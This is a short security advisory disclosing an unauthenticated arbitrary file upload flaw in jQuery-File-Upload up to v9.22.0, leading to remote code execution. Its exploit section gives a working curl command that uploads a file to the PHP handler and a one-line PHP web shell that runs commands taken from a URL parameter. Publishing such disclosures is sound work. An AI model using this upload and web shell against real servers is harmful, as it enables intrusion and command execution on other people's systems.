Title: jQuery-File-Upload <= v9.22.0 unauthenticated arbitrary file upload vulnerability Author: Larry W. Cashdollar, @_larry0 Date: 2018-10-09 CVE-ID:[CVE-none] Download Site: https://github.com/blueimp/jQuery-File-Upload/releases Vendor: https://github.com/blueimp Vendor Notified: 2018-10-09 Vendor Contact: Advisory: http://www.vapidlabs.com/advisory.php?v=204 Description: File Upload widget with multiple file selection, drag&drop support, progress bar, validation and preview images, audio and video for jQuery. Supports cross-domain, chunked and resumable file uploads. Works with any server-side platform (Google App Engine, PHP, Python, Ruby on Rails, Java, etc.) that supports standard HTML form file uploads. Vulnerability: The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php doesn't require any validation to upload files to the server. It also doesn't exclude file types. This allows for remote code execution. This has been actively exploited in the wild for over a year. Exploit Code: $ curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php Where shell.php is: <?php $cmd=$_GET['cmd']; system($cmd);?>